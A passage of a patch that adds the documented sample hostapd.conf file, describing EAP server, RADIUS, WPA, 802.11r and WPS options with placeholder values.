reauthentication period in seconds (default: 3600 seconds; 0 = disable ++# reauthentication). ++#eap_reauth_period=3600 ++ ++# Use PAE group address (01:80:c2:00:00:03) instead of individual target ++# address when sending EAPOL frames with driver=wired. 
This is the most common ++# mechanism used in wired authentication, but it also requires that the port ++# is only used by one station. ++#use_pae_group_addr=1 ++ ++# EAP Re-authentication Protocol (ERP) authenticator (RFC 6696) ++# ++# Whether to initiate EAP authentication with EAP-Initiate/Re-auth-Start before ++# EAP-Identity/Request ++#erp_send_reauth_start=1 ++# ++# Domain name for EAP-Initiate/Re-auth-Start. Omitted from the message if not ++# set (no local ER server). This is also used by the integrated EAP server if ++# ERP is enabled (eap_server_erp=1). ++#erp_domain=example.com ++ ++##### Integrated EAP server ################################################### ++ ++# Optionally, hostapd can be configured to use an integrated EAP server ++# to process EAP authentication locally without need for an external RADIUS ++# server. This functionality can be used both as a local authentication server ++# for IEEE 802.1X/EAPOL and as a RADIUS server for other devices. ++ ++# Use integrated EAP server instead of external RADIUS authentication ++# server. This is also needed if hostapd is configured to act as a RADIUS ++# authentication server. ++#eap_server=0 ++ ++# Path for EAP server user database ++# If SQLite support is included, this can be set to "sqlite:/path/to/sqlite.db" ++# to use SQLite database instead of a text file. ++#eap_user_file=/etc/hostapd.eap_user ++ ++# CA certificate (PEM or DER file) for EAP-TLS/PEAP/TTLS ++#ca_cert=/etc/hostapd.ca.pem ++ ++# Server certificate (PEM or DER file) for EAP-TLS/PEAP/TTLS ++#server_cert=/etc/hostapd.server.pem ++ ++# Private key matching with the server certificate for EAP-TLS/PEAP/TTLS ++# This may point to the same file as server_cert if both certificate and key ++# are included in a single file. PKCS#12 (PFX) file (.p12/.pfx) can also be ++# used by commenting out server_cert and specifying the PFX file as the ++# private_key. 
++#private_key=/etc/hostapd.server.prv ++ ++# Passphrase for private key ++#private_key_passwd=secret passphrase ++ ++# Server identity ++# EAP methods that provide mechanism for authenticated server identity delivery ++# use this value. If not set, "hostapd" is used as a default. ++#server_id=server.example.com ++ ++# Enable CRL verification. ++# Note: hostapd does not yet support CRL downloading based on CDP. Thus, a ++# valid CRL signed by the CA is required to be included in the ca_cert file. ++# This can be done by using PEM format for CA certificate and CRL and ++# concatenating these into one file. Whenever CRL changes, hostapd needs to be ++# restarted to take the new CRL into use. ++# 0 = do not verify CRLs (default) ++# 1 = check the CRL of the user certificate ++# 2 = check all CRLs in the certificate path ++#check_crl=1 ++ ++# TLS Session Lifetime in seconds ++# This can be used to allow TLS sessions to be cached and resumed with an ++# abbreviated handshake when using EAP-TLS/TTLS/PEAP. ++# (default: 0 = session caching and resumption disabled) ++#tls_session_lifetime=3600 ++ ++# Cached OCSP stapling response (DER encoded) ++# If set, this file is sent as a certificate status response by the EAP server ++# if the EAP peer requests certificate status in the ClientHello message. ++# This cache file can be updated, e.g., by running following command ++# periodically to get an update from the OCSP responder: ++# openssl ocsp \ ++# -no_nonce \ ++# -CAfile /etc/hostapd.ca.pem \ ++# -issuer /etc/hostapd.ca.pem \ ++# -cert /etc/hostapd.server.pem \ ++# -url http://ocsp.example.com:8888/ \ ++# -respout /tmp/ocsp-cache.der ++#ocsp_stapling_response=/tmp/ocsp-cache.der ++ ++# Cached OCSP stapling response list (DER encoded OCSPResponseList) ++# This is similar to ocsp_stapling_response, but the extended version defined in ++# RFC 6961 to allow multiple OCSP responses to be provided. 
++#ocsp_stapling_response_multi=/tmp/ocsp-multi-cache.der ++ ++# dh_file: File path to DH/DSA parameters file (in PEM format) ++# This is an optional configuration file for setting parameters for an ++# ephemeral DH key exchange. In most cases, the default RSA authentication does ++# not use this configuration. However, it is possible setup RSA to use ++# ephemeral DH key exchange. In addition, ciphers with DSA keys always use ++# ephemeral DH keys. This can be used to achieve forward secrecy. If the file ++# is in DSA parameters format, it will be automatically converted into DH ++# params. This parameter is required if anonymous EAP-FAST is used. ++# You can generate DH parameters file with OpenSSL, e.g., ++# "openssl dhparam -out /etc/hostapd.dh.pem 2048" ++#dh_file=/etc/hostapd.dh.pem ++ ++# OpenSSL cipher string ++# ++# This is an OpenSSL specific configuration option for configuring the default ++# ciphers. If not set, "DEFAULT:!EXP:!LOW" is used as the default. ++# See https://www.openssl.org/docs/apps/ciphers.html for OpenSSL documentation ++# on cipher suite configuration. This is applicable only if hostapd is built to ++# use OpenSSL. ++#openssl_ciphers=DEFAULT:!EXP:!LOW ++ ++# Fragment size for EAP methods ++#fragment_size=1400 ++ ++# Finite cyclic group for EAP-pwd. Number maps to group of domain parameters ++# using the IANA repository for IKE (RFC 2409). ++#pwd_group=19 ++ ++# Configuration data for EAP-SIM database/authentication gateway interface. ++# This is a text string in implementation specific format. The example ++# implementation in eap_sim_db.c uses this as the UNIX domain socket name for ++# the HLR/AuC gateway (e.g., hlr_auc_gw). In this case, the path uses "unix:" ++# prefix. If hostapd is built with SQLite support (CONFIG_SQLITE=y in .config), ++# database file can be described with an optional db= parameter. 
++#eap_sim_db=unix:/tmp/hlr_auc_gw.sock ++#eap_sim_db=unix:/tmp/hlr_auc_gw.sock db=/tmp/hostapd.db ++ ++# EAP-SIM DB request timeout ++# This parameter sets the maximum time to wait for a database request response. ++# The parameter value is in seconds. ++#eap_sim_db_timeout=1 ++ ++# Encryption key for EAP-FAST PAC-Opaque values. This key must be a secret, ++# random value. It is configured as a 16-octet value in hex format. It can be ++# generated, e.g., with the following command: ++# od -tx1 -v -N16 /dev/random | colrm 1 8 | tr -d ' ' ++#pac_opaque_encr_key=000102030405060708090a0b0c0d0e0f ++ ++# EAP-FAST authority identity (A-ID) ++# A-ID indicates the identity of the authority that issues PACs. The A-ID ++# should be unique across all issuing servers. In theory, this is a variable ++# length field, but due to some existing implementations requiring A-ID to be ++# 16 octets in length, it is strongly recommended to use that length for the ++# field to provid interoperability with deployed peer implementations. This ++# field is configured in hex format. ++#eap_fast_a_id=101112131415161718191a1b1c1d1e1f ++ ++# EAP-FAST authority identifier information (A-ID-Info) ++# This is a user-friendly name for the A-ID. For example, the enterprise name ++# and server name in a human-readable format. This field is encoded as UTF-8. ++#eap_fast_a_id_info=test server ++ ++# Enable/disable different EAP-FAST provisioning modes: ++#0 = provisioning disabled ++#1 = only anonymous provisioning allowed ++#2 = only authenticated provisioning allowed ++#3 = both provisioning modes allowed (default) ++#eap_fast_prov=3 ++ ++# EAP-FAST PAC-Key lifetime in seconds (hard limit) ++#pac_key_lifetime=604800 ++ ++# EAP-FAST PAC-Key refresh time in seconds (soft limit on remaining hard ++# limit). The server will generate a new PAC-Key when this number of seconds ++# (or fewer) of the lifetime remains. 
++#pac_key_refresh_time=86400 ++ ++# EAP-SIM and EAP-AKA protected success/failure indication using AT_RESULT_IND ++# (default: 0 = disabled). ++#eap_sim_aka_result_ind=1 ++ ++# Trusted Network Connect (TNC) ++# If enabled, TNC validation will be required before the peer is allowed to ++# connect. Note: This is only used with EAP-TTLS and EAP-FAST. If any other ++# EAP method is enabled, the peer will be allowed to connect without TNC. ++#tnc=1 ++ ++# EAP Re-authentication Protocol (ERP) - RFC 6696 ++# ++# Whether to enable ERP on the EAP server. ++#eap_server_erp=1 ++ ++##### IEEE 802.11f - Inter-Access Point Protocol (IAPP) ####################### ++ ++# Interface to be used for IAPP broadcast packets ++#iapp_interface=eth0 ++ ++ ++##### RADIUS client configuration ############################################# ++# for IEEE 802.1X with external Authentication Server, IEEE 802.11 ++# authentication with external ACL for MAC addresses, and accounting ++ ++# The own IP address of the access point (used as NAS-IP-Address) ++own_ip_addr=127.0.0.1 ++ ++# NAS-Identifier string for RADIUS messages. When used, this should be unique ++# to the NAS within the scope of the RADIUS server. Please note that hostapd ++# uses a separate RADIUS client for each BSS and as such, a unique ++# nas_identifier value should be configured separately for each BSS. This is ++# particularly important for cases where RADIUS accounting is used ++# (Accounting-On/Off messages are interpreted as clearing all ongoing sessions ++# and that may get interpreted as applying to all BSSes if the same ++# NAS-Identifier value is used.) For example, a fully qualified domain name ++# prefixed with a unique identifier of the BSS (e.g., BSSID) can be used here. ++# ++# When using IEEE 802.11r, nas_identifier must be set and must be between 1 and ++# 48 octets long. ++# ++# It is mandatory to configure either own_ip_addr or nas_identifier to be ++# compliant with the RADIUS protocol. 
When using RADIUS accounting, it is ++# strongly recommended that nas_identifier is set to a unique value for each ++# BSS. ++#nas_identifier=ap.example.com ++ ++# RADIUS client forced local IP address for the access point ++# Normally the local IP address is determined automatically based on configured ++# IP addresses, but this field can be used to force a specific address to be ++# used, e.g., when the device has multiple IP addresses. ++#radius_client_addr=127.0.0.1 ++ ++# RADIUS authentication server ++#auth_server_addr=127.0.0.1 ++#auth_server_port=1812 ++#auth_server_shared_secret=secret ++ ++# RADIUS accounting server ++#acct_server_addr=127.0.0.1 ++#acct_server_port=1813 ++#acct_server_shared_secret=secret ++ ++# Secondary RADIUS servers; to be used if primary one does not reply to ++# RADIUS packets. These are optional and there can be more than one secondary ++# server listed. ++#auth_server_addr=127.0.0.2 ++#auth_server_port=1812 ++#auth_server_shared_secret=secret2 ++# ++#acct_server_addr=127.0.0.2 ++#acct_server_port=1813 ++#acct_server_shared_secret=secret2 ++ ++# Retry interval for trying to return to the primary RADIUS server (in ++# seconds). RADIUS client code will automatically try to use the next server ++# when the current server is not replying to requests. If this interval is set, ++# primary server will be retried after configured amount of time even if the ++# currently used secondary server is still working. ++#radius_retry_primary_interval=600 ++ ++ ++# Interim accounting update interval ++# If this is set (larger than 0) and acct_server is configured, hostapd will ++# send interim accounting updates every N seconds. Note: if set, this overrides ++# possible Acct-Interim-Interval attribute in Access-Accept message. Thus, this ++# value should not be configured in hostapd.conf, if RADIUS server is used to ++# control the interim interval. ++# This value should not be less 600 (10 minutes) and must not be less than ++# 60 (1 minute). 
++#radius_acct_interim_interval=600
++
++# Request Chargeable-User-Identity (RFC 4372)
++# This parameter can be used to configure hostapd to request CUI from the
++# RADIUS server by including Chargeable-User-Identity attribute into
++# Access-Request packets.
++#radius_request_cui=1
++
++# Dynamic VLAN mode; allow RADIUS authentication server to decide which VLAN
++# is used for the stations. This information is parsed from following RADIUS
++# attributes based on RFC 3580 and RFC 2868: Tunnel-Type (value 13 = VLAN),
++# Tunnel-Medium-Type (value 6 = IEEE 802), Tunnel-Private-Group-ID (value
++# VLANID as a string). Optionally, the local MAC ACL list (accept_mac_file) can
++# be used to set static client MAC address to VLAN ID mapping.
++# 0 = disabled (default)
++# 1 = option; use default interface if RADIUS server does not include VLAN ID
++# 2 = required; reject authentication if RADIUS server does not include VLAN ID
++#dynamic_vlan=0
++
++# Per-Station AP_VLAN interface mode
++# If enabled, each station is assigned its own AP_VLAN interface.
++# This implies per-station group keying and ebtables filtering of inter-STA
++# traffic (when passed through the AP).
++# If the sta is not assigned to any VLAN, then its AP_VLAN interface will be
++# added to the bridge given by the "bridge" configuration option (see above).
++# Otherwise, it will be added to the per-VLAN bridge.
++# 0 = disabled (default)
++# 1 = enabled
++#per_sta_vif=0
++
++# VLAN interface list for dynamic VLAN mode is read from a separate text file.
++# This list is used to map VLAN ID from the RADIUS server to a network
++# interface. Each station is bound to one interface in the same way as with
++# multiple BSSIDs or SSIDs. Each line in this text file is defining a new
++# interface and the line must include VLAN ID and interface name separated by
++# white space (space or tab).
++# If no entries are provided by this file, the station is statically mapped
++# to . interfaces.
++#vlan_file=/etc/hostapd.vlan
++
++# Interface where 802.1q tagged packets should appear when a RADIUS server is
++# used to determine which VLAN a station is on. hostapd creates a bridge for
++# each VLAN. Then hostapd adds a VLAN interface (associated with the interface
++# indicated by 'vlan_tagged_interface') and the appropriate wireless interface
++# to the bridge.
++#vlan_tagged_interface=eth0
++
++# Bridge (prefix) to add the wifi and the tagged interface to. This gets the
++# VLAN ID appended. It defaults to brvlan%d if no tagged interface is given
++# and br%s.%d if a tagged interface is given, provided %s = tagged interface
++# and %d = VLAN ID.
++#vlan_bridge=brvlan
++
++# When hostapd creates a VLAN interface on vlan_tagged_interfaces, it needs
++# to know how to name it.
++# 0 = vlan, e.g., vlan1
++# 1 = ., e.g. eth0.1
++#vlan_naming=0
++
++# Arbitrary RADIUS attributes can be added into Access-Request and
++# Accounting-Request packets by specifying the contents of the attributes with
++# the following configuration parameters. There can be multiple of these to
++# add multiple attributes. These parameters can also be used to override some
++# of the attributes added automatically by hostapd.
++# Format: [:]
++# attr_id: RADIUS attribute type (e.g., 26 = Vendor-Specific)
++# syntax: s = string (UTF-8), d = integer, x = octet string
++# value: attribute value in format indicated by the syntax
++# If syntax and value parts are omitted, a null value (single 0x00 octet) is
++# used.
++#
++# Additional Access-Request attributes
++# radius_auth_req_attr=[:]
++# Examples:
++# Operator-Name = "Operator"
++#radius_auth_req_attr=126:s:Operator
++# Service-Type = Framed (2)
++#radius_auth_req_attr=6:d:2
++# Connect-Info = "testing" (this overrides the automatically generated value)
++#radius_auth_req_attr=77:s:testing
++# Same Connect-Info value set as a hexdump
++#radius_auth_req_attr=77:x:74657374696e67
++
++#
++# Additional Accounting-Request attributes
++# radius_acct_req_attr=[:]
++# Examples:
++# Operator-Name = "Operator"
++#radius_acct_req_attr=126:s:Operator
++
++# Dynamic Authorization Extensions (RFC 5176)
++# This mechanism can be used to allow dynamic changes to user session based on
++# commands from a RADIUS server (or some other disconnect client that has the
++# needed session information). For example, Disconnect message can be used to
++# request an associated station to be disconnected.
++#
++# This is disabled by default. Set radius_das_port to non-zero UDP port
++# number to enable.
++#radius_das_port=3799
++#
++# DAS client (the host that can send Disconnect/CoA requests) and shared secret
++#radius_das_client=192.168.1.123 shared secret here
++#
++# DAS Event-Timestamp time window in seconds
++#radius_das_time_window=300
++#
++# DAS require Event-Timestamp
++#radius_das_require_event_timestamp=1
++#
++# DAS require Message-Authenticator
++#radius_das_require_message_authenticator=1
++
++##### RADIUS authentication server configuration ##############################
++
++# hostapd can be used as a RADIUS authentication server for other hosts. This
++# requires that the integrated EAP server is also enabled and both
++# authentication services are sharing the same configuration.
++
++# File name of the RADIUS clients configuration for the RADIUS server. If this
++# commented out, RADIUS server is disabled.
++#radius_server_clients=/etc/hostapd.radius_clients
++
++# The UDP port number for the RADIUS authentication server
++#radius_server_auth_port=1812
++
++# The UDP port number for the RADIUS accounting server
++# Commenting this out or setting this to 0 can be used to disable RADIUS
++# accounting while still enabling RADIUS authentication.
++#radius_server_acct_port=1813
++
++# Use IPv6 with RADIUS server (IPv4 will also be supported using IPv6 API)
++#radius_server_ipv6=1
++
++
++##### WPA/IEEE 802.11i configuration ##########################################
++
++# Enable WPA. Setting this variable configures the AP to require WPA (either
++# WPA-PSK or WPA-RADIUS/EAP based on other configuration). For WPA-PSK, either
++# wpa_psk or wpa_passphrase must be set and wpa_key_mgmt must include WPA-PSK.
++# Instead of wpa_psk / wpa_passphrase, wpa_psk_radius might suffice.
++# For WPA-RADIUS/EAP, ieee8021x must be set (but without dynamic WEP keys),
++# RADIUS authentication server must be configured, and WPA-EAP must be included
++# in wpa_key_mgmt.
++# This field is a bit field that can be used to enable WPA (IEEE 802.11i/D3.0)
++# and/or WPA2 (full IEEE 802.11i/RSN):
++# bit0 = WPA
++# bit1 = IEEE 802.11i/RSN (WPA2) (dot11RSNAEnabled)
++#wpa=1
++
++# WPA pre-shared keys for WPA-PSK. This can be either entered as a 256-bit
++# secret in hex format (64 hex digits), wpa_psk, or as an ASCII passphrase
++# (8..63 characters) that will be converted to PSK. This conversion uses SSID
++# so the PSK changes when ASCII passphrase is used and the SSID is changed.
++# wpa_psk (dot11RSNAConfigPSKValue)
++# wpa_passphrase (dot11RSNAConfigPSKPassPhrase)
++#wpa_psk=0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef
++#wpa_passphrase=secret passphrase
++
++# Optionally, WPA PSKs can be read from a separate text file (containing list
++# of (PSK,MAC address) pairs. This allows more than one PSK to be configured.
++# Use absolute path name to make sure that the files can be read on SIGHUP
++# configuration reloads.
++#wpa_psk_file=/etc/hostapd.wpa_psk
++
++# Optionally, WPA passphrase can be received from RADIUS authentication server
++# This requires macaddr_acl to be set to 2 (RADIUS)
++# 0 = disabled (default)
++# 1 = optional; use default passphrase/psk if RADIUS server does not include
++# Tunnel-Password
++# 2 = required; reject authentication if RADIUS server does not include
++# Tunnel-Password
++#wpa_psk_radius=0
++
++# Set of accepted key management algorithms (WPA-PSK, WPA-EAP, or both). The
++# entries are separated with a space. WPA-PSK-SHA256 and WPA-EAP-SHA256 can be
++# added to enable SHA256-based stronger algorithms.
++# (dot11RSNAConfigAuthenticationSuitesTable)
++#wpa_key_mgmt=WPA-PSK WPA-EAP
++
++# Set of accepted cipher suites (encryption algorithms) for pairwise keys
++# (unicast packets). This is a space separated list of algorithms:
++# CCMP = AES in Counter mode with CBC-MAC [RFC 3610, IEEE 802.11i/D7.0]
++# TKIP = Temporal Key Integrity Protocol [IEEE 802.11i/D7.0]
++# Group cipher suite (encryption algorithm for broadcast and multicast frames)
++# is automatically selected based on this configuration. If only CCMP is
++# allowed as the pairwise cipher, group cipher will also be CCMP. Otherwise,
++# TKIP will be used as the group cipher.
++# (dot11RSNAConfigPairwiseCiphersTable)
++# Pairwise cipher for WPA (v1) (default: TKIP)
++#wpa_pairwise=TKIP CCMP
++# Pairwise cipher for RSN/WPA2 (default: use wpa_pairwise value)
++#rsn_pairwise=CCMP
++
++# Time interval for rekeying GTK (broadcast/multicast encryption keys) in
++# seconds. (dot11RSNAConfigGroupRekeyTime)
++#wpa_group_rekey=600
++
++# Rekey GTK when any STA that possesses the current GTK is leaving the BSS.
++# (dot11RSNAConfigGroupRekeyStrict)
++#wpa_strict_rekey=1
++
++# Time interval for rekeying GMK (master key used internally to generate GTKs
++# (in seconds).
++#wpa_gmk_rekey=86400
++
++# Maximum lifetime for PTK in seconds. This can be used to enforce rekeying of
++# PTK to mitigate some attacks against TKIP deficiencies.
++#wpa_ptk_rekey=600
++
++# Enable IEEE 802.11i/RSN/WPA2 pre-authentication. This is used to speed up
++# roaming be pre-authenticating IEEE 802.1X/EAP part of the full RSN
++# authentication and key handshake before actually associating with a new AP.
++# (dot11RSNAPreauthenticationEnabled)
++#rsn_preauth=1
++#
++# Space separated list of interfaces from which pre-authentication frames are
++# accepted (e.g., 'eth0' or 'eth0 wlan0wds0'. This list should include all
++# interface that are used for connections to other APs. This could include
++# wired interfaces and WDS links. The normal wireless data interface towards
++# associated stations (e.g., wlan0) should not be added, since
++# pre-authentication is only used with APs other than the currently associated
++# one.
++#rsn_preauth_interfaces=eth0
++
++# peerkey: Whether PeerKey negotiation for direct links (IEEE 802.11e) is
++# allowed. This is only used with RSN/WPA2.
++# 0 = disabled (default)
++# 1 = enabled
++#peerkey=1
++
++# ieee80211w: Whether management frame protection (MFP) is enabled
++# 0 = disabled (default)
++# 1 = optional
++# 2 = required
++#ieee80211w=0
++
++# Group management cipher suite
++# Default: AES-128-CMAC (BIP)
++# Other options (depending on driver support):
++# BIP-GMAC-128
++# BIP-GMAC-256
++# BIP-CMAC-256
++# Note: All the stations connecting to the BSS will also need to support the
++# selected cipher. The default AES-128-CMAC is the only option that is commonly
++# available in deployed devices.
++#group_mgmt_cipher=AES-128-CMAC
++
++# Association SA Query maximum timeout (in TU = 1.024 ms; for MFP)
++# (maximum time to wait for a SA Query response)
++# dot11AssociationSAQueryMaximumTimeout, 1...4294967295
++#assoc_sa_query_max_timeout=1000
++
++# Association SA Query retry timeout (in TU = 1.024 ms; for MFP)
++# (time between two subsequent SA Query requests)
++# dot11AssociationSAQueryRetryTimeout, 1...4294967295
++#assoc_sa_query_retry_timeout=201
++
++# disable_pmksa_caching: Disable PMKSA caching
++# This parameter can be used to disable caching of PMKSA created through EAP
++# authentication. RSN preauthentication may still end up using PMKSA caching if
++# it is enabled (rsn_preauth=1).
++# 0 = PMKSA caching enabled (default)
++# 1 = PMKSA caching disabled
++#disable_pmksa_caching=0
++
++# okc: Opportunistic Key Caching (aka Proactive Key Caching)
++# Allow PMK cache to be shared opportunistically among configured interfaces
++# and BSSes (i.e., all configurations within a single hostapd process).
++# 0 = disabled (default)
++# 1 = enabled
++#okc=1
++
++# SAE threshold for anti-clogging mechanism (dot11RSNASAEAntiCloggingThreshold)
++# This parameter defines how many open SAE instances can be in progress at the
++# same time before the anti-clogging mechanism is taken into use.
++#sae_anti_clogging_threshold=5
++
++# Enabled SAE finite cyclic groups
++# SAE implementation are required to support group 19 (ECC group defined over a
++# 256-bit prime order field). All groups that are supported by the
++# implementation are enabled by default. This configuration parameter can be
++# used to specify a limited set of allowed groups. The group values are listed
++# in the IANA registry:
++# http://www.iana.org/assignments/ipsec-registry/ipsec-registry.xml#ipsec-registry-9
++#sae_groups=19 20 21 25 26
++
++##### IEEE 802.11r configuration ##############################################
++
++# Mobility Domain identifier (dot11FTMobilityDomainID, MDID)
++# MDID is used to indicate a group of APs (within an ESS, i.e., sharing the
++# same SSID) between which a STA can use Fast BSS Transition.
++# 2-octet identifier as a hex string.
++#mobility_domain=a1b2
++
++# PMK-R0 Key Holder identifier (dot11FTR0KeyHolderID)
++# 1 to 48 octet identifier.
++# This is configured with nas_identifier (see RADIUS client section above).
++
++# Default lifetime of the PMK-RO in minutes; range 1..65535
++# (dot11FTR0KeyLifetime)
++#r0_key_lifetime=10000
++
++# PMK-R1 Key Holder identifier (dot11FTR1KeyHolderID)
++# 6-octet identifier as a hex string.
++# Defaults to BSSID.
++#r1_key_holder=000102030405
++
++# Reassociation deadline in time units (TUs / 1.024 ms; range 1000..65535)
++# (dot11FTReassociationDeadline)
++#reassociation_deadline=1000
++
++# List of R0KHs in the same Mobility Domain
++# format: <128-bit key as hex string>
++# This list is used to map R0KH-ID (NAS Identifier) to a destination MAC
++# address when requesting PMK-R1 key from the R0KH that the STA used during the
++# Initial Mobility Domain Association.
++#r0kh=02:01:02:03:04:05 r0kh-1.example.com 000102030405060708090a0b0c0d0e0f
++#r0kh=02:01:02:03:04:06 r0kh-2.example.com 00112233445566778899aabbccddeeff
++# And so on.. One line per R0KH.
++
++# List of R1KHs in the same Mobility Domain
++# format: <128-bit key as hex string>
++# This list is used to map R1KH-ID to a destination MAC address when sending
++# PMK-R1 key from the R0KH. This is also the list of authorized R1KHs in the MD
++# that can request PMK-R1 keys.
++#r1kh=02:01:02:03:04:05 02:11:22:33:44:55 000102030405060708090a0b0c0d0e0f
++#r1kh=02:01:02:03:04:06 02:11:22:33:44:66 00112233445566778899aabbccddeeff
++# And so on.. One line per R1KH.
++
++# Whether PMK-R1 push is enabled at R0KH
++# 0 = do not push PMK-R1 to all configured R1KHs (default)
++# 1 = push PMK-R1 to all configured R1KHs whenever a new PMK-R0 is derived
++#pmk_r1_push=1
++
++# Whether to enable FT-over-DS
++# 0 = FT-over-DS disabled
++# 1 = FT-over-DS enabled (default)
++#ft_over_ds=1
++
++##### Neighbor table ##########################################################
++# Maximum number of entries kept in AP table (either for neigbor table or for
++# detecting Overlapping Legacy BSS Condition). The oldest entry will be
++# removed when adding a new entry that would make the list grow over this
++# limit. Note! WFA certification for IEEE 802.11g requires that OLBC is
++# enabled, so this field should not be set to 0 when using IEEE 802.11g.
++# default: 255
++#ap_table_max_size=255
++
++# Number of seconds of no frames received after which entries may be deleted
++# from the AP table. Since passive scanning is not usually performed frequently
++# this should not be set to very small value. In addition, there is no
++# guarantee that every scan cycle will receive beacon frames from the
++# neighboring APs.
++# default: 60
++#ap_table_expiration_time=3600
++
++# Maximum number of stations to track on the operating channel
++# This can be used to detect dualband capable stations before they have
++# associated, e.g., to provide guidance on which colocated BSS to use.
++# Default: 0 (disabled)
++#track_sta_max_num=100
++
++# Maximum age of a station tracking entry in seconds
++# Default: 180
++#track_sta_max_age=180
++
++# Do not reply to group-addressed Probe Request from a station that was seen on
++# another radio.
++# Default: Disabled
++#
++# This can be used with enabled track_sta_max_num configuration on another
++# interface controlled by the same hostapd process to restrict Probe Request
++# frame handling from replying to group-addressed Probe Request frames from a
++# station that has been detected to be capable of operating on another band,
++# e.g., to try to reduce likelihood of the station selecting a 2.4 GHz BSS when
++# the AP operates both a 2.4 GHz and 5 GHz BSS concurrently.
++#
++# Note: Enabling this can cause connectivity issues and increase latency for
++# discovering the AP.
++#no_probe_resp_if_seen_on=wlan1
++
++# Reject authentication from a station that was seen on another radio.
++# Default: Disabled
++#
++# This can be used with enabled track_sta_max_num configuration on another
++# interface controlled by the same hostapd process to reject authentication
++# attempts from a station that has been detected to be capable of operating on
++# another band, e.g., to try to reduce likelihood of the station selecting a
++# 2.4 GHz BSS when the AP operates both a 2.4 GHz and 5 GHz BSS concurrently.
++#
++# Note: Enabling this can cause connectivity issues and increase latency for
++# connecting with the AP.
++#no_auth_if_seen_on=wlan1
++
++##### Wi-Fi Protected Setup (WPS) #############################################
++
++# WPS state
++# 0 = WPS disabled (default)
++# 1 = WPS enabled, not configured
++# 2 = WPS enabled, configured
++#wps_state=2
++
++# Whether to manage this interface independently from other WPS interfaces
++# By default, a single hostapd process applies WPS operations to all configured
++# interfaces. This parameter can be used to disable that behavior for a subset
++# of interfaces. If this is set to non-zero for an interface, WPS commands
++# issued on that interface do not apply to other interfaces and WPS operations
++# performed on other interfaces do not affect this interface.
++#wps_independent=0
++
++# AP can be configured into a locked state where new WPS Registrar are not
++# accepted, but previously authorized Registrars (including the internal one)
++# can continue to add new Enrollees.
++#ap_setup_locked=1
++
++# Universally Unique IDentifier (UUID; see RFC 4122) of the device
++# This value is used as the UUID for the internal WPS Registrar. If the AP
++# is also using UPnP, this value should be set to the device's UPnP UUID.
++# If not configured, UUID will be generated based on the local MAC address.
++#uuid=12345678-9abc-def0-1234-56789abcdef0
++
++# Note: If wpa_psk_file is set, WPS is used to generate random, per-device PSKs
++# that will be appended to the wpa_psk_file. If wpa_psk_file is not set, the
++# default PSK (wpa_psk/wpa_passphrase) will be delivered to Enrollees. Use of
++# per-device PSKs is recommended as the more secure option (i.e., make sure to
++# set wpa_psk_file when using WPS with WPA-PSK).
++
++# When an Enrollee requests access to the network with PIN method, the Enrollee
++# PIN will need to be entered for the Registrar. PIN request notifications are
++# sent to hostapd ctrl_iface monitor. In addition, they can be written to a
++# text file that could be used, e.g., to populate the AP administration UI with
++# pending PIN requests. If the following variable is set, the PIN requests will
++# be written to the configured file.
++#wps_pin_requests=/var/run/hostapd_wps_pin_requests
++
++# Device Name
++# User-friendly description of device; up to 32 octets encoded in UTF-8
++#device_name=Wireless AP
++
++# Manufacturer
++# The manufacturer of the device (up to 64 ASCII characters)
++#manufacturer=Company
++
++# Model Name
++# Model of the device (up to 32 ASCII characters)
++#model_name=WAP
++
++# Model Number
++# Additional device description (up to 32 ASCII characters)
++#model_number=123
++
++# Serial Number
++# Serial number of the device (up to 32 characters)
++#serial_number=12345
++
++# Primary Device Type
++# Used format: --
++# categ = Category as an integer value
++# OUI = OUI and type octet as a 4-octet hex-encoded value; 0050F204 for
++# default WPS OUI
++# subcateg = OUI-specific Sub Category as an integer value
++# Examples:
++# 1-0050F204-1 (Computer / PC)
++# 1-0050F204-2 (Computer / Server)
++# 5-0050F204-1 (Storage / NAS)
++# 6-0050F204-1 (Network Infrastructure / AP)
++#device_type=6-0050F204-1
++
++# OS Version
++# 4-octet operating system version number (hex string)
++#os_version=01020300
++
++# Config Methods
++# List of the supported configuration methods
++# Available methods: usba ethernet label display ext_nfc_token int_nfc_token
++# nfc_interface push_button keypad virtual_display physical_display
++# virtual_push_button physical_push_button
++#config_methods=label virtual_display virtual_push_button keypad
++
++# WPS capability discovery workaround for PBC with Windows 7
++# Windows 7 uses incorrect way of figuring out AP's WPS capabilities by acting
++# as a Registrar and using M1 from the AP. The config methods attribute in that
++# message is supposed to indicate only the configuration method supported by
++# the AP in Enrollee role, i.e., to add an external Registrar. For that case,
++# PBC shall not be used and as such, the PushButton config method is removed
++# from M1 by default. If pbc_in_m1=1 is included in the configuration file,
++# the PushButton config method is left in M1 (if included in config_methods
++# parameter) to allow Windows 7 to use PBC instead of PIN (e.g., from a label
++# in the AP).
++#pbc_in_m1=1
++
++# Static access point PIN for initial configuration and adding Registrars
++# If not set, hostapd will not allow external WPS Registrars to control the
++# access point. The AP PIN can also be set at runtime with hostapd_cli
++# wps_ap_pin command. Use of temporary (enabled by user action) and random
++# AP PIN is much more secure than configuring a static AP PIN here. As such,
++# use of the ap_pin parameter is not recommended if the AP device has means for
++# displaying a random PIN.
++#ap_pin=12345670
++
++# Skip building of automatic WPS credential
++# This can be used to allow the automatically generated Credential attribute to
++# be replaced with pre-configured Credential(s).
++#skip_cred_build=1
++
++# Additional Credential attribute(s)
++# This option can be used to add pre-configured Credential attributes into M8
++# message when acting as a Registrar. If skip_cred_build=1, this data will also
++# be able to override the Credential attribute that would have otherwise been
++# automatically generated based on network configuration. This configuration
++# option points to an external file that much contain the WPS Credential
++# attribute(s) as binary data.
++#extra_cred=hostapd.cred
++
++# Credential processing
++# 0 = process received credentials internally (default)
++# 1 = do not process received credentials; just pass them over ctrl_iface to
++# external program(s)
++# 2 = process received credentials internally and pass them over ctrl_iface
++# to external program(s)
++# Note: With wps_cred_processing=1, skip_cred_build should be set to 1 and
++# extra_cred be used to provide the Credential data for Enrollees.
++#
++# wps_cred_processing=1 will disabled automatic updates of hostapd.conf file
++# both for Credential processing and for marking AP Setup Locked based on
++# validation failures of AP PIN. An external program is responsible on updating
++# the configuration appropriately in this case.
++#wps_cred_processing=0
++
++# AP Settings Attributes for M7
++# By default, hostapd generates the AP Settings Attributes for M7 based on the
++# current configuration. It is possible to override this by providing a file
++# with pre-configured attributes. This is similar to extra_cred file format,
++# but the AP Settings attributes are not encapsulated in a Credential
++# attribute.
++#ap_settings=hostapd.ap_settings
++
++# WPS UPnP interface
++# If set, support for external Registrars is enabled.
++#upnp_iface=br0
++
++# Friendly Name (required for UPnP)
++# Short description for end use. Should be less than 64 characters.
